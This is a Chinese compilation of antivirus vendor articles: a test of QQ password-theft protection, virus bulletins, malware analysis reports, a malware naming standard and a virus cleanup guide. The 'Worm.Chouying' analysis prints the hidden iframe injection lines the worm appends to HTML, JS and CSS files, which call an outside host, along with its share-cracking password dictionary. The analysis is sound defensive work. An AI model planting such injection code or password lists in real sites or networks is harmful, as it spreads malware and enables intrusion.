暴力测试看效果：谁家杀毒软件可防止QQ密码被盗(1)
国内杀毒软件的测试环境　　
    国内三家杀毒软件都在年底推出了自己的2006版新品，并且都说自己能够查杀木马，有隐私保护功能保证密码不会被盗。到底这几家的密码防盗如何，让我们进行个暴力测试看看实际效果。

    既然是暴力测试，就一定得找个真家伙，我用的是一个盗QQ的木马。他运行以后会记录用户的QQ密码，然后把信息加密保存在系统目录下面（文件名为recinfo.dll），然后再通过邮件发出去。

    测试环境：Athlon 64 3000+、1GB内存、Win2000 SP4中文版、裸机测试

    为了测试公平，每测试完一个软件都用Ghost重新恢复系统，并且不开启杀毒软件的监控，只使用隐私保护功能。

    没有安装任何的杀毒软件和防火墙进行测试，为了防止密码被发送出去，测试过程中先拔掉了网线。

    运行木马，然后打开QQ，输入号码和密码。木马会记录密码，然后在system32目录下生成“recinfo.dll”。

　　
 

    文件可以用记事本打开，里面记录的应该就是QQ号码和密码的信息了。　　

    一旦连通网络以后，这个文件的内容会自动通过邮件发出去，并且会删除这个文件。

　　

暴力测试看效果：谁家杀毒软件可防止QQ密码被盗(2)
瑞星2006木马墙成功拦截

　瑞星2006　　



　瑞星今年产品的主打卖点之一是“木马墙”密码防盗，在测试中确实发现他和其他的杀毒软件不太一样。这个功能在个人防火墙2006中，所以测试的时候没有安装它的杀毒软件。 它不需要事先把密码什么的录入进去，在防火墙的游戏保护里把QQ加进去就OK了。






　然后运行病毒程序再启动QQ，瑞星个人防火墙立即提示检测到QQ正在运行。





　退出QQ后，在System32目录下也 没有生成记录密码的文件。




　

　同时，瑞星的防火墙提示有进程访问QQ，点击详情以后可以看到是哪些程序要访问QQ的进程。

　其中Sysapis.dll文件就是病毒释放的。　　

　感觉瑞星06的木马墙防盗功能确实不错，要是说明书写得再清楚点就好了，我琢磨了半天才知道木马墙原来在游戏保护里面...









一起评测的其他两家软件：一个一声不吭 默默被虐，一个象哑巴一样不能报警。密码都没有被保护住。

　整个测试完毕，感觉瑞星2006确实是下功夫了，木马墙效果确实不错，防火墙比以前强大了不少，杀毒软件也不像05那么占内存了。

瑞星公司04月01日发布 每日计算机病毒及木马播报
    据瑞星全球反病毒监测网介绍，今日有一个病毒特别值得注意，它是：“威金蠕虫变种QP（Worm.Viking.qp）”病毒。该病毒集文件型病毒、蠕虫病毒、病毒下载器于一身，传播能力非常强。该病毒会破坏用户的一些软件，造成它们无法使用。

本日热门病毒：

　　“威金蠕虫变种QP（Worm.Viking.qp）”病毒：警惕程度★★★☆，蠕虫病毒，通过感染文件、局域网以及其它病毒下载传播，依赖系统：WIN9X/NT/2000/XP。

　　它会感染Windows可执行文件，并会查找局域网中的所有共享计算机，尝试猜解它们的密码，试图感染这些计算机。该病毒还会自动在后台下载并运行“QQ通行证”等其它病毒，窃取用户QQ及网络游戏的账号和密码并发送给黑客。由于该病毒在编写上存在一些问题，可造成一些用户的软件被破坏，无法使用。目前，不少杀毒软件仅能对染毒文件进行删除处理，造成用户的文件丢失。瑞星杀毒软件2007版可以清除掉染毒文件中的病毒，并将这些文件恢复成正常状态。

　　反病毒专家建议电脑用户采取以下措施预防该病毒：1、建立良好的安全习惯，不打开可疑邮件和可疑网站；2、很多病毒利用漏洞传播，一定要及时给系统打补丁；3、安装专业的防毒软件升级到最新版本，并打开实时监控程序；4、安装带有“木马墙”功能的个人防火墙软件，防止密码丢失。5、登陆http://tool.ikaka.com下载并安装免费的瑞星卡卡3.2，并开启“IE防漏墙”功能，防止病毒通过IE漏洞侵入计算机。

　　如遇病毒，请拨打反病毒急救电话：010-82678800。能够上网的用户可以访问瑞星反病毒资讯网：http://www.rising.com.cn或登录http://help.rising.com.cn使用在线专家门诊进行免费咨询。

“MSN 照片”病毒疯狂传播 已经有数百台电脑中招
    【快讯】3月27日，瑞星截获一个通过MSN软件传播的后门病毒，并命名为“MSN照片（Worm.IRC.MyPhoto.a）”。瑞星反病毒专家介绍说，感染该病毒之后，中毒电脑会自动向MSN好友发送英文消息，并试图传送名为“photo album.zip”的压缩文件，用户打开压缩包中的文件后就会中毒。

    该病毒利用MSN向外发送病毒文件，大量消耗系统资源和网络带宽，因此对个人电脑还是企业局域网都有很大影响。同时它还会在中毒电脑里开置后门，窃取个人资料，从而使用户面临更多的安全威胁。目前已有数百用户向瑞星求助，瑞星客户服务中心的专家认为，该病毒的传播速度会继续增快，感染用户数可能会呈几何级数增长。




    据瑞星反病毒专家介绍，此病毒与两年前肆虐一时的“MSN性感烤鸡”病毒极其相似。由于MSN软件相对安全，使得很多用户对于MSN类病毒缺乏警惕，这也使得“MSN照片”、“性感烤鸡”等病毒传播速度快、感染范围广。

    瑞星技术部门对该病毒的分析表明，中毒用户会向MSN好友发送“Hey wanna see my new photo album?（嘿，想看看我的新照片集吗？）”、“hey you got a photo album? anyways heres my new photo album :) accept k?（嘿，收到我的新照片没有？这是我的新照片，收一下！）”等英文消息，并会传送“photo album.zip”压缩文件。如果用户接收并运行该文件，就会中毒。

    瑞星反病毒专家提醒广大网民，针对“MSN照片”病毒，用户应采取如下措施：不要轻易通过MSN接收和运行陌生文件；尽快更新自己的杀毒软件版本，瑞星杀毒软件19.16.12版本可以彻底清除此病毒。

瑞星最新病毒分析报告："Win32.Miser.a(吝啬鬼)"
病毒运行后有以下行为：

    1. 病毒在C:\ Program Files\Internet Explorer\目录下生成两个文件，文件名为IEXPL0RE.EXE和WebTime.exe，并把文件属性设置为隐藏。这两个文件均为病毒，病毒名分别为”Trojan.Mnless.fz”、”Trojan.DL.Agent.gys”

    2. 添加注册表项以下键值，以达到其自启动的目的：
HKEY_LOCAL_MACHINE \SOFTWARE\\Microsoft\Windows\CurrentVersion\Run
数据项名：”IgfxTray”
数据值为” C:\Program Files\Internet Explorer\IEXPL0RE.EXE”

    3. 将WebTime.exe注册为服务程序，使其可以每次开机时运行。

    4. 感染D、 E、 F、 G、 H、 I、盘下扩展名为”.EXE”的文件，并在被感染目录下生成desktop.ini文件作为该目录已经感染的标记，desktop.ini文件中记录病毒感染的时间。被感染文件图标被改为斗地主游戏主程序的图标，如图：






    5. 关闭包含以下字符串的窗口：
“internet explorer”、“收藏”、“主页”、“服务器正在”、“错误”、“.wmf”、“安全”、“rror”、“内存”、“.bat”、“.com”、“.exe”   

    6. 每隔30s删除IE的Cookies文件。   

    7. 使用IE打开”http://219.232.224.126/ind2.htm”网页。

    8. 显示QQ新斗地主刷分王V2008对话框，以迷惑用户，让用户以为这是一个正常软件。

瑞星最新病毒分析报告：“Worm.Chouying（仇英）”



    病毒使用Delphi编写，Upack压缩。运行后将在%SYSTEM%目录下复制一份病毒本体文件，文件名为” Lying.exe”。病毒主程序(.exe)文件的主要功能是释放病毒动态库文件”Lying.dll”，并且该动态加载运行。病毒的主要功能代码都集中在这个动态库文件中。

该病毒的主要行为：

    一、将病毒动态库文件”Lying.dll”加载到explorer.exe,services.exe,winlogon.exe三个进程中。

    二、感染文件扩展名为".EXE"、".SCR"、".PIF"、".COM"、".BAT"的PE文件，感染的方式是将被感染文件作为文件的附加数据添加在病毒文件的尾部，将修改感染文件的图标资源使其图标与被感染文件一致。

    三、修改文件扩展名为".HTM"、".HTML"、".ASP"、".ASPX"、".ASA"、".CDX"、".CER"、".PHP"、".JSP"、".INC"的文件，在文件尾部添加以下内容：
<iframe src="http://www.0x145b.com/fuck.htm" width="0" height="0" style="overflow:hidden;backgroup-color:black;border:none;" frameborder="0"></iframe>
(该网址并不存在，但是作者的目的很可能是通过包含漏洞的网页传播病毒)

    四、修改文件扩展名为".JS"的文件，在文件尾部添加以下内容：
document.write(',27h,'<iframe src="http://www.0x145b.com/fuck.htm" width="0" height="0" style="overflow:hidden;backgroup-color:black;border:none;" frameborder="0"></iframe>);
(该网址并不存在，但是作者的目的很可能是通过包含漏洞的网页传播病毒)

    五、修改文件扩展名为" .CSS"的文件，在文件尾部添加以下内容：
body {background-image: url(javascript:document.write("<iframe src="http://www.0x145b.com/fuck.htm" width="0" height="0" style="overflow:hidden;backgroup-color:black;border:none;"frameborder="0"></iframe>"))}
(该网址并不存在，但是作者的目的很可能是通过包含漏洞的网页传播病毒)

    六、通过局域网共享目录进行传播，并且其具有猜测计算机的弱口令的功能，
病毒会猜测以下用户的口令：“Administrator”、“admin”、“Root”。
使用的密码字典为："root"、"Password"、"1234"、"12345"、"123456"、"1234567"、
"12345678"、"123456789"、"123321"、"654321"、"54321"、"4321"、"111111"、
"121212"、"123123"、"1234qwer"、"123abc"、"000000"、"00000000"、
"11111111"、"88888888"、"88888"、"pass"、"passwd"、"database"、
"abcd"、"abc123"、"oracle"、"sybase"、"123qwe"、"server"、
"computer"、"internet"、"super"、"123asd"、"ihavenopass"、
"godblessyou"、"enable"、"2004"、"2005"、"2006"、"2007"、
"2008"、"test123"、"admin123"、"wangba"、"user"、"users"、
"abcd123"、"asdf"、"asdf123"、"windows"、"windows2000"、
"windowsxp"、"windows2003"、"window"、"love"、"iloveyou"、
"loveyou"、"test"、"temp"、"hao123"、"adsl"、"kaonima"、
"happy"、"login"、"home"、"mylove"、"guest"、"data"、"date"、
"mypass"、"mypass123"、"fuck"、"cctv"、"live"、"zxcv"、"fuckyou"、
"999999"、"foobar"、"china"、"japan"、"temp123"、"yxcv"、
"guest123"、"guest321"、"5201314"、"5021314"、"ghost"、
"goodbye"、"byebye"、"520520"。

    七、下载http://www.0x145b.com/Lying.ini这个文件，然后根据文件内容再下载其中的文件到本地计算机运行。

与”熊猫烧香”病毒的异同

    与”熊猫烧香”病毒的相同点为：
    1) 病毒的目的以及其作用相同，都是为了经济利益协助传播其他病毒；

    2) 病毒的传播方式相同，同样是通过感染可执行文件、包含漏洞的网页、网络共享目录进行传播；

    与”熊猫烧香”病毒的相同点为：
    1) 感染文件的手段更隐蔽，”熊猫烧香”病毒感染文件后有很明显的现象，即：被感染的文件的图标都变成了病毒的图标；“仇英”病毒感染文件后被感染的文件从外表上看不出什么变化。

    2) 修改的网页文件类型有所增加，加大了清除的难度。

    3) 病毒的执行形态有所变化，病毒的主要功能包含在病毒的动态库文件中，并且该动态库文件被加载系统进程当中，使得病毒的感染、传播、下载其他病毒的行为可以持续进行。

“仇英”病毒的传播情况，及发展趋势
    目前“仇英”病毒处于刚刚开始流传的阶段，并没开始大面积的传播，病毒传播的网址” http://www.0x145b.com”是虚假的，但是如果病毒的源代码被广泛流传，并且被不法分子利用，那么很可能又会造成与”熊猫烧香”病毒一样的后果。

“熊猫烧香”病毒变种传播情况
    到目前为止瑞星公司已经截获了107个”熊猫烧香”病毒的变种。

计算机通用病毒定义及命名规范详解 

　　病毒名是由以下6字段组成的：主行为类型.子行为类型.宿主文件类型.主名称.版本信息.主名称变种号#附属名称.附属名称变种号.病毒长度。其中字段之间使用“.”分隔，#号以后属于内部信息，为推举结构。

主行为类型与病毒子行为类型

　　病毒可能包含多个主行为类型，这种情况可以通过每种主行为类型的危害级别确定危害级别最高的作为病毒的主行为类型。同样的，病毒也可能包含多个子行为类型，这种情况可以通过每种主行为类型的危害级别确定危害级别最高的作为病毒的子行为类型。其中危害级别是指对病毒所在计算机的危害。

　　病毒主行为类型有是否显示的属性，用于生成病毒名时隐藏主行为名称。它与病毒子行为类型存在对应关系，见下表：

主行为类型 子行为类型
Backdoor
危害级别：1
说明：
中文名称—“后门”， 是指在用户不知道也不允许的情况下，在被感染的系统上以隐蔽的方式运行可以对被感染的系统进行远程控制，而且用户无法通过正常的方法禁止其运行。“后门”其实是木马的一种特例，它们之间的区别在于“后门”可以对被感染的系统进行远程控制（如：文件管理、进程控制等）。
 

Worm
危害级别：2
说明：
中文名称—“蠕虫”，是指利用系统的漏洞、外发邮件、共享目录、可传输文件的软件（如：MSN、OICQ、IRC等）、可移动存储介质（如：U盘、软盘），这些方式传播自己的病毒。这种类型的病毒其子型行为类型用于表示病毒所使用的传播方式。
Mail
危害级别：1
说明：通过邮件传播

IM
危害级别：2
说明：通过某个不明确的载体或多个明确的载体传播自己

MSN
危害级别：3
说明：通过MSN传播

QQ
危害级别：4
说明：通过OICQ传播

ICQ
危害级别：5
说明：通过ICQ传播

P2P
危害级别：6
说明：通过P2P软件传播

IRC
危害级别：7
说明：通过ICR传播

说明：不依赖其他软件进行传播的传播方式，如：利用系统漏洞、共享目录、可移动存储介质。

Trojan
危害级别：3
说明：
中文名称—“木马”，是指在用户不知道也不允许的情况下，在被感染的系统上以隐蔽的方式运行，而且用户无法通过正常的方法禁止其运行。这种病毒通常都有利益目的，它的利益目的也就是这种病毒的子行为。
Spy
危害级别：1
说明：窃取用户信息（如：文件等）

PSW
危害级别：2
说明：具有窃取密码的行为

DL
危害级别：3
说明：下载病毒并运行
一、判定条款:
没有可调出的任何界面,逻辑功能为:从某网站上下载文件加载或运行.
二、逻辑条件引发的事件:
事件1、.不能正常下载或下载的文件不能判定为病毒。
操作准则:该文件不能符合正常软件功能组件标识条款的,确定为:Trojan.DL
事件2.下载的文件是病毒
操作准则: 下载的文件是病毒,确定为: Trojan.DL

IMMSG
危害级别：4
说明：通过某个不明确的载体或多个明确的载体传播即时消息（这一行为与蠕虫的传播行为不同，蠕虫是传播病毒自己，木马仅仅是传播消息）

MSNMSG
危害级别：5
说明：通过MSN传播即时消息

QQMSG
危害级别：6
说明：通过OICQ传播即时消息

ICQMSG
危害级别：7
说明：通过ICQ传播即时消息

UCMSG
危害级别：8
说明：通过UC传播即时消息

Proxy
危害级别：9
说明：将被感染的计算机作为代理服务器

Clicker
危害级别：10
说明：点击指定的网页
判定条款:
没有可调出的任何界面,逻辑功能为:点击某网页。
操作准则:
该文件不符合正常软件功能组件标识条款的,确定为:Trojan.Clicker。
(该文件符合正常软件功能组件标识条款,就参考流氓软件判定规则进行流氓软件判定)

Dialer
危害级别：12
说明：通过拨号来骗取Money的程序

说明：无法描述其利益目的但又符合木马病毒的基本特征，则不用具体的子行为进行描述

AOL
按照原来病毒名命名保留。

Notifier
按照原来病毒名命名保留。

Virus
危害级别：4
说明：中文名称—“感染型病毒”，是指将病毒代码附加到被感染的宿主文件（如：PE文件、DOS下的COM文件、VBS文件、具有可运行宏的文件）中，使病毒代码在被感染宿主文件运行时取得运行权的病毒。
 

Harm
危害级别：5
说明：中文名称—“破坏性程序”，是指那些不会传播也不感染，运行后直接破坏本地计算机（如：格式化硬盘、大量删除文件等）导致本地计算机无法正常使用的程序。
 

Dropper
危害级别：6
说明：中文名称—“释放病毒的程序”，是指不属于正常的安装或自解压程序，并且运行后释放病毒并将它们运行。
一．Dropper判定条款:
没有可调出的任何界面，逻辑功能为:自释放文件加载或运行。

二．逻辑条件引发的事件:
事件1：.释放的文件不是病毒。
操作准则: 释放的文件和释放者本身没逻辑关系并该文件不符合正常软件功能组件标识条款的,确定为:Droper
事件2：释放的文件是病毒。
操作准则: 释放的文件是病毒，确定该文件为:Droper

Hack
危害级别：无
说明：中文名称—“黑客工具”，是指可以在本地计算机通过网络攻击其他计算机的工具。
Exploit
说明：漏洞探测攻击工具

DDoser
说明：拒绝服务攻击工具

Flooder
说明：洪水攻击工具

说明：不能明确攻击方式并与黑客相关的软件，则不用具体的子行为进行描述

Spam
说明：垃圾邮件。

Nuker

Sniffer

Spoofer

Anti
说明：免杀的黑客工具

Binder
危害级别：无
说明：捆绑病毒的工具
 


　　正常软件功能组件标识条款：被检查的文件体内有以下信息能标识出该文件是正常软件的功能组件：文件版本信息,软件信息（注册表键值、安装目录）等。

宿主文件

　　宿主文件是指病毒所使用的文件类型，有是否显示的属性。目前的宿主文件有以下几种。　

JS 说明：JavaScript脚本文件
VBS 说明：VBScript脚本文件
HTML 说明：HTML文件
Java 说明：Java的Class文件
COM 说明：Dos下的Com文件
EXE 说明：Dos下的Exe文件
Boot 说明：硬盘或软盘引导区
Word 说明：MS公司的Word文件
Excel 说明：MS公司的Excel文件
PE 说明：PE文件
WinREG 说明：注册表文件
Ruby 说明：一种脚本
Python 说明：一种脚本
BAT 说明：BAT脚本文件
IRC 说明：IRC脚本

主名称

　　病毒的主名称是由分析员根据病毒体的特征字符串、特定行为或者所使用的编译平台来定的，如果无法确定则可以用字符串”Agent”来代替主名称，小于10k大小的文件可以命名为“Samll”。

版本信息

　　版本信息只允许为数字，对于版本信息不明确的不加版本信息。

主名称变种号

　　如果病毒的主行为类型、行为类型、宿主文件类型、主名称均相同，则认为是同一家族的病毒，这时需要变种号来区分不同的病毒记录。如果一位版本号不够用则最多可以扩展3位，并且都均为小写字母a—z，如：aa、ab、aaa、aab以此类推。由系统自动计算，不需要人工输入或选择。

附属名称

　　病毒所使用的有辅助功能的可运行的文件，通常也作为病毒添加到病毒库中，这种类型的病毒记录需要附属名称来与病毒主体的病毒记录进行区分。附属名称目前有以下几种：

Client 说明：后门程序的控制端
KEY_HOOK 说明：用于挂接键盘的模块
API_HOOK 说明：用于挂接API的模块
Install 说明：用于安装病毒的模块
Dll 说明：文件为动态库，并且包含多种功能
（空） 说明：没有附属名称，这条记录是病毒主体记录

附属名称变种号

　　如果病毒的主行为类型、行为类型、宿主文件类型、主名称、主名称变种号、附属名称均相同，则认为是同一家族的病毒，这时需要变种号来区分不同的病毒记录。变种号为不写字母a—z，如果一位版本号不够用则最多可以扩展3位，如：aa、ab、aaa、aab以此类推。由系统自动计算，不需要人工输入或选择。

病毒长度

　　病毒长度字段只用于主行为类型为感染型（Virus）的病毒，字段的值为数字。字段值为0，表示病毒长度可变。

病毒疫情等级描述

病毒疫情等级用四种颜色表示，分别为：绿色、黄色、橙色和红色。四种颜色中绿色级别最低，红色为最高，它们的具体含义如下：


正常  绿色：目前网络较安全，用户只需要进行日常的杀毒软件升级，并打开杀毒软件的实时监控功能即可。
警惕  黄色：目前网络中存在一定数量的病毒，用户需要实时地升级杀毒软件进行防范，并打开杀毒软件的实时监控功能。
危险  橙色：目前网络中病毒情况较为严重，用户需要实时升级杀毒软件并打开杀毒软件的实时监控功能进行防范，并使用杀毒软件进行全盘扫描。
高危  红色：目前网络中病毒情况为高度危险，用户不仅需要实时升级杀毒软件并打开杀毒软件的实时监控功能、使用杀毒软件进行全盘扫描，还应时刻关注杀毒软件厂商发布的安全信息，做好防卫工作。

计算机病毒怎样入侵你的计算机

一般计算机病毒的入侵都是有一定的规律性的，计算机病毒常用以下几种方式入侵我们的计算机：

利用操作系统漏洞传播病毒 利用操作系统存在的安全漏洞来进行攻击你的计算机，比如冲击波，震荡波。例如您的计算机感染冲击波病毒后，计算机就会弹出一个对话框，提示“您的计算机将在 1分钟内关闭”，然后便开始 1分钟倒计时，计时完毕后您的计算机就会自动关闭。
通过电子邮件传播病毒 通过电子邮件传播病毒也是比较常见的一种病毒传播方式。通常会有 邮件会以提示中奖，免费下载等诱人消息提示的方式诱骗用户打开邮件附件或带有病毒的网站，以达到使病毒入侵计算机的目的。最常见的就是病毒发送大量垃圾邮件，造成企业邮件服务器瘫痪，网速减慢。有些病毒还会删除系统文件，篡改系统注册表，导致计算机不能正常工作。
通过网站下载传播病毒 通常会有一些提供音乐，视频等点击率较高的网站，或提供色情，反动宣传资料下载等不健康网站中被病毒传播者们利用，利用这些点击率较高的网页来达到更好的病毒传播目的。

通过即时通讯工具传播病毒
有很多木马病毒，较为常见的如：“ QQ尾巴”病毒都是通过OICQ来传播的。常见的就是当你感染病毒后，在你用OICQ， ICQ，MSN等工具给对方发送一条信息的时候，系统会自动的给对方发送一条有病毒潜伏的网页地址，或发送一个文件。而你却看不到这条信息，对方点击此链接地址，或打开运行此文件时，很可能就会被感染。
通过感染文件传播 CIH 、Funlove等病毒都是通过感染Windows可执行文件（PE格式文件）进行传播，通常被这类病毒感染的系统运行会比较缓慢，并且一些大的自解压缩文件也可能被这种病毒破坏而无法打开。
通过其他方式进行感染 如通过引导区、移动存储设备等进行传播。

如何干净地清除病毒?

1 、在安全模式或纯DOS模式下清除病毒
　　当计算机感染病毒的时候，绝大多数的感染病毒的处理可以在正常模式下彻底清除病毒，这里说的正常模式准确的说法应该是实模式（Real Mode），这里通俗点说了。其包括正常模式的 Windows 和正常模式的 Windows 下的 "MS-DOS 方式 " 或 " 命令提示符 " 。 但有些病毒由于使用了更加隐匿和狡猾的手段往往会对杀毒软件进行攻击甚至是删除系统中的杀毒软件的做法，针对这样的病毒绝大多数的杀毒软件都被设计为在安全模式可安装、使用、执行杀毒处理。 　
　　 在安全模式（Safe Mode）或者纯DOS下进行清除清除时，对于现在大多数流行的病毒，如蠕虫病毒、木马程序和网页代码病毒等，都可以在安全模式下彻底清除的，不必要像以前那样必须要用软盘启动杀毒；但对于一些引导区病毒和感染可执行文件的病毒才需要在纯 DOS下杀毒（建议用干净软盘启动杀毒）。而且，当计算机原来就感染了病毒，那就更需要在安装反病毒软件后（升级到最新的病毒库），在安全模式（Safe Mode）或者纯DOS下清除一遍病毒了！ 
2 、带毒文件在\Temporary Internet Files目录下
　　由于这个目录下的文件，Windows 会对此有一定的保护作用，所以对这个目录下的带毒文件即使在安全模式下也不能进行清除，对于这种情况，请先关闭其他一些程序软件，然后打开 IE ，选择IE工具栏中的 " 工具"\"Internet 选项 "，选择 " 删除文件 " 删除即可，如果有提示" 删除所有脱机内容 "，也请选上一并删除。
3 、带毒文件在 \_Restore 目录下，*.cpy 文件中
　　这是系统还原存放还原文件的目录，只有在装了Windows Me/XP 操作系统上才会有这个目录，由于系统对这个目录有保护作用。
　　对于这种情况需要先取消" 系统还原 " 功能，然后将带毒文件删除，甚至将整个目录删除也是可以的。
4 、带毒文件在.rar 、.zip 、.cab 等压缩文件中
　　对于绝大多数的反病毒软件来说，现在的查杀压缩文件中病毒的功能已经基本完善了，单是对于一些特殊类型的压缩文件或者加了密码保护的压缩文件就可能直接清除了。
　　要清除压缩文件中的病毒，建议解压缩后清除，或者借助压缩工具软件的外挂杀毒程序的功能，对带毒的压缩文件进行杀毒。 
5 、病毒在引导区或者SUHDLOG.DAT或SUHDLOG.BAK文件中
　　这种病毒一般是引导区病毒，报告的病毒名称一般带有 boot 、 wyx 等字样。如果病毒只是存在于移动存储设备（如软盘、闪存盘、移动硬盘）上，就可以借助本地硬盘上的反病毒软件直接进行查杀；
　　 如果这种病毒是在硬盘上，则需要用干净的可引导盘启动进行查杀。 对于这类病毒建议用干净软盘启动进行查杀，不过在查杀之前一定要备份原来的引导区，特别是原来装有别的操作系统的情况，如日文Windows 、Linux 等。 如果没有干净的可引导盘，则可使用下面的方法进行应急杀毒：
(1) 在别的计算机上做一张干净的可引导盘，此引导盘可以在Windows 95/98/ME 系统上通过 " 添加／删除程序 " 进行制作，但要注意的是，制作软盘的操作系统须和自己所使用的操作系统相同；
(2) 用这张软盘引导启动带毒的计算机，然后运行以下命令：
A:\>fdisk/mbr
A:\>sys a: c: 
　　 针对 NT 构架的操作系统可首先安装“管理员控制台”，安装后使用管理员控制台，然后分别执行 fixmbr （恢复主引导记录）和 fixboot （恢复启动盘上的引导区）命令对引导区及启动信息进行修复。
如果带毒的文件是在 SUHDLOG.DAT 或 SUHDLOG.BAK 文件中，那么直接删除即可。这是系统在安装的时候对硬盘引导区做的一个备份文件，一般作用不大，病毒在其中已经不起作用了。 
6 、带毒文件在一些邮件文件中，如 dbx 、 eml 、 box 等
　　绝大多数的防毒软件可以直接检查这些邮件文件中的文件是否带毒，对于邮箱中的带毒的信件，可以根据用户的设置杀毒或删除带毒邮件，但是由于此类邮箱的复合文件结构，易出现杀毒后的邮箱依旧可以检测到病毒情况，这是由于没有压缩邮箱进行空间释放的原因导致的，您可以尝试在 Outlook Express 中选择“工具” — 〉“选项” — 〉“维护” — 〉“立即清除” — 〉“压缩”
7 、文件中有病毒的残留代码
　　这种情况比较多见的就是带有 CIH 、Funlove 、宏病毒（包括 Word 、 Excel 、 Powerpoint 和 Wordpro 等文档中的宏病毒）和个别网页病毒的残留代码，通常防毒软件对这些带有病毒残留代码的文件报告的病毒名称后缀通常是 int 、 app 等结尾，而且并不常见，如 W32/FunLove.app 、W32.Funlove.int 。一般情况下，这些残留的代码不会影响正常程序的运行，也不会传染，如果需要彻底清除的话，要根据各个病毒的实际情况进行清除。
8 、文件错误
　　这种情况出现的并不多，通常是由于某些病毒对系统中的关键文件修改后造成的，异常的文件无法正常使用，同时易造成别的系统错误，针对此种情况建议进行修复安装的方法恢复系统中的关键文件。
9 、加密的文件或目录
　　对于一些加密了的文件或目录，请在解密后再进行病毒查杀。 
10 、共享目录杀毒
　　这里包括两种情况：本地共享目录和网络中远程共享目录（其中也包括映射盘）。 　
　　遇到本地共享的目录中的带毒文件不能清除的情况，通常是局域网中别的用户在读写这些文件，杀毒的时候表现为无法直接清除这些带毒文件中的病毒，如果是有病毒在对这些目录在写病毒操作，表现为对共享目录进行清除病毒操作后，还是不断有文件被感染或者不断生成病毒文件。以上这两种情况，都建议取消共享，然后针对共享目录进行彻底查杀，恢复共享的时候，注意不要开放太高的权限，并对共享目录加设密码。 对远程的共享目录（包括映射盘）查杀病毒的时候，首先要保证本地计算机的操作系统是干净的，同时对共享目录也有最高的读写权限。如果是远程计算机感染病毒的话，建议还是直接在远程计算机进行查杀病毒。
　　特别的，如果在清除别的病毒的时侯都建议取消所有的本地共享，再进行杀毒操作。在平时的使用中，也应注意共享目录的安全性，加设密码，同时，非必要的情况下，不要直接读取远程共享目录中的文件，建议拷贝到本地检查过病毒后再进行操作。 
11 、光盘等一些存储介质
　　对于光盘上带有的病毒，不要试图直接清除，这是因为光盘上的文件都是只读的原因导致的。同时，对另外一些存储设备查杀病毒的，也需要注意其是否处于写保护或者密码保护状态。